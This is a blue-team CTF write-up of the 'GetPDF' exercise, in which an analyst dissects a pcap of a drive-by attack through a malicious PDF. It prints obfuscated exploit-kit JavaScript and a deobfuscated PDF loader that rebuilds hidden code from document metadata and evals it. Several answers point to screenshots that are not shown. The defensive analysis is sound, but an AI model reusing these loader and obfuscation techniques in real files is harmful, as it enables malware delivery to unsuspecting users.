Scenario: PDF format is the de-facto standard in exchanging documents online. Such popularity, however, has also attracted cyber criminals in spreading malware to unsuspecting users. The ability to generate malicious pdf files to distribute malware is a functionality that has been built into many exploit kits. As users are less cautious about opening PDF files, the malicious PDF file has become quite a successful attack vector.
The network traffic is captured in lala.pcap contains network traffic related to a typical malicious PDF file attack, in which an unsuspecting user opens a compromised web page, which redirects the user’s web browser to a URL of a malicious PDF file. As the PDF plug-in of the browser opens the PDF, the unpatched version of Adobe Acrobat Reader is exploited and, as a result, downloads and silently installs malware on the user’s machine.
As a soc analyst, analyze the PDF and answer the questions.
How many URL path(s) are involved in this incident?
This is most likely related to HTTP, checking HTTP requests, there are 6 unique HTTP requests:
What is the URL which contains the JS code?
Looking into the HTTP stream, we can see the server packets and the JS code is included in the server response:
What is the URL hidden in the JS code?
Using de4js, the script can be decoded to:
var DepanNegw = window;
var DexeTelae = -44;
DexeTelae += 45;
XayeZebah = 'nedajemac';
var GaDemee = 'e5vfqaIVblI5'.replace(/[5fqIVbI5]/g, '');
ZavevTa = 'fazemezarawaseb';
var MezRai = parseInt;
var DayahDet = 'zafezed lacet cetexet jevecakemahamaha febenep cafa fezebefe yelaxa xejarer hejefaqazedeka kebeneh petaqe zevexej jenewabahegehar jabevame bayap def vasefezetevamer nefelaba sezaxewe qajeqeme wet reyeqer magemefele xelawece denew jafelev haweqa kel vatabaser mag vejefama xeca canapevezejev benaper gezazevaja zeyaxaf wehekeh jecalava set senajaj re kameken bazafakaqewate zaralek yecele kak s hexebeka heha jeyeteg sase wayefewa tey gawewem wefaravavepayeke xedevec gavayedegeqer casehes watenanesajet jelagal payevexebe pejasep heqefagabexemew deheler vejegeca hece rafenadamenaxe jaz fex hekases pazetepajamelew cerasej nevayezabevepeke pex gey dac g dezaleza kekeqebe peyemaf sevanededa cefagey defef cexaqehe sebex galahal zadaxaran lava falamedejegase set law mefe wa mex ces nam j xaxaped gexeqageb feqeled daseze tehadeh zeheteyera xanahef wepahena xarakel gadazecaq tabexape dareq seje lejegagaxavade haf jaz cewe me cag kem fed h legefaz taw keyacah wefereweverewaze rapecame kas fagavev facez yefeley lareke seperene gav lece gahepegesafeve dez gen yeje s waz qas xap c hademax mezezah qepawehe vad zejates pe cehajeg sabebaseqeseda sekesav nebeda cagareg kec fexewel bejewagedegeqene bajesade lav pasepad baraj xecavan vedepe veranake vej heva kejajemacajada wez saj vele x qaj vad fag y qetamefe jaxa kamatare net zeheweh jeme bale cexebedeleneye dab vev kekaxex jetecajek lejekabe qalef bevegeye caxeb beleteqe r hele saxafexazat baz dehakajegeqeneke met mefepexafecebera qwertyu iop asdfghj klzxcvbnmqwer tyuiopa sdfghjklzxcvbnmq hjklzxc vbnmqwer tyu iopasdfghjklzxc vbnmqwe rtyuiopas dfghjkl zxcvbnmqwertyuio pasdfgh jklzxcvbnmqwert yuiopas dfghjk lzxcvbnm qwertyuiop asdfghj klzxcvbnmqwerty uiopasd fghjkl zxcvbnmq werty uio pasdfghjklzxcvb nmqwert yuiopasdfghjklzx cvbnmqwe rty uiopasd fghjklzx uio pasdfghjklzxcvb nmqwert uiopasdfghjklz qwertyui opasdfghjk xcr vbnmqwertyuiopar sdfghjr klzxcvr bnmqwer rtyuiopasdfghjkr lzxcvbnr mqr wertyur iopasr dfghjkr lzxcvbnmqwertyr uiopasdr fghr jklzxcr vbnmqwertr yuiopar sdfr ghjklr zxcvbnmqwertyuir opasdfr ghjr klzxcvr bnmqwertr yuiopar sr dfghjkr lzxcvbnmqwerr dfghjkr lzxcvbnmqwerr tyuiopr asdfgr hjklzxr cvbnmqwertyuior pasdfgr hjklzxcr vbnmqwr ertyur met mefepexafecebera xanahef wepahena feqeled daseze tabexape dareq zexelede l cefagey defef hademax mezezah req batekeqaheteceh zateyene c zekeqay ratevecek veheleqe k dec tec xece jefexazeqayefes cama bapevexeladet keh lanawebasegecaja qefejev qepetekene dacegas relevaj fecasece ber veyayes ba kajebed savaketegemeqe wepecer lamege tere ratavacevejezax gey dasalaje gav yepakekehe'.split(' ');
var ZeJexn = '';
var SerayYafags = String;
var KesXanavn = -50;
KesXanavn += 66;
XadHef = 78;
var BeZao = 47;
BeZao += -47;
var FeceSabejo = -46;
FeceSabejo += 48;
GebJep = 92;
var SeWajec = 'ftr9wogmBwJCW5h6aixrPRCs1ZonjHjdjKueMkD'.replace(/[t9wgBwJW56ixPRs1ZnjHjjKuMkD]/g, '');
MaqTa = 5;
GaDemee = DepanNegw[GaDemee];
SeWajec = SerayYafags[SeWajec];
for (YajMedei = BeZao; YajMedei < DayahDet.length - 1; YajMedei += FeceSabejo) ZeJexn += SeWajec(MezRai((DayahDet[YajMedei + BeZao].length - 1).toString(KesXanavn) + (DayahDet[YajMedei + DexeTelae].length - 1).toString(KesXanavn), KesXanavn));
GaDemee(ZeJexn)There is no mention or indicators for a URL, but after this request, there is a GET request for a URL. This is the URL that is hidden in the script above.
What is the MD5 hash of the PDF file contained in the packet?
Looking into HTTP export objects, the .pdf that we can export is fcexploit.pdf. Run the md5sum command to grab the hash.
How many object(s) are contained inside the PDF file?
I used the pdfid.py tool to contain all the PDF objects:
How many filtering schemes are used for the object streams?
What is the number of the ‘object stream’ that might contain malicious JS code?
Answering both questions into one, first we want to locate all streams and then focus on JS using peepdf:
With pdf-parser we can take a took at Javascript stream 4, which references stream 5. This answers both questions. There are 4 different filters used: “/FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode” and the malicious JS code is in stream 5.
Analyzing the PDF file. What ‘object-streams’ contain the JS code responsible for executing the shellcodes? The JS code is divided into two streams. Format: two numbers separated with ‘,’. Put the numbers in ascending order
Looking thru the stream, there are 2 stream with high length and both with 4 filters for the stream, these are the shellcodes:
The JS code responsible for executing the exploit contains shellcodes that drop malicious executable files. What is the full path of malicious executable files after being dropped by the malware on the victim machine?
To be able to find the shellcode, lets try to clean up the JS code:
var SSS = null;
var SS = 'eval';
var $S = '';
$5 = 'info';
app.doc.syncAnnotScan();
S$ = 'title';
if (app.plugIns.length != 0) {
var $$ = 0;
____SSS = app.doc.getAnnots({ nPage: 0 });
$S = this.info.title;
}
var S5 = '';
if (app.plugIns.length > 3) {
var arr = $S.split(/U_155bf62c9aU_7917ab39/);
for (var $ = 1; $ < arr.length; $++) {
S5 += String.fromCharCode('0x' + arr[$]);
}
}
if (app.plugIns.length >= 2) {
app[SS](S5);
}Of note there is a string “U_155bf62c9aU_7917ab39” and the references of “getAnnots”, which is an object we examine PDFs. We were also able to complete the variables eval, info, and title.
Using tree command in pdfid.py, we can view the different annots, of note we want to focus on stream 7 and 9 as these were the streams we previously noted as malicious and related to shellcode:
Stream 7:
Stream 9:
Info (stream 10):
For stream 10, we can see that the same string is spammed, replacing it out with nothing, we can see something that resembles code:
Now using this code, we can trace it back to stream 9 by the string “X_17844743X_170987743” and stream 7 by the string “89af50d”. Now we can build our formula for both streams:
Using sdbg, we can take one of the shellcodes and run them to see what their contents contain. The exectuable path will is included in the shellcode.
The PDF file contains another exploit related to CVE-2010–0188. What is the URL of the malicious executable that the shellcode associated with this exploit drop?
Could use the hints to solve this one, but this URL can also be found in the wireshark traffic:
How many CVEs are included in the PDF file?
Researching online, all 4 shellcodes and this file CVE total 5 CVEs.
Thanks for reading!
Link to exercise: https://cyberdefenders.org/blueteam-ctf-challenges/getpdf/
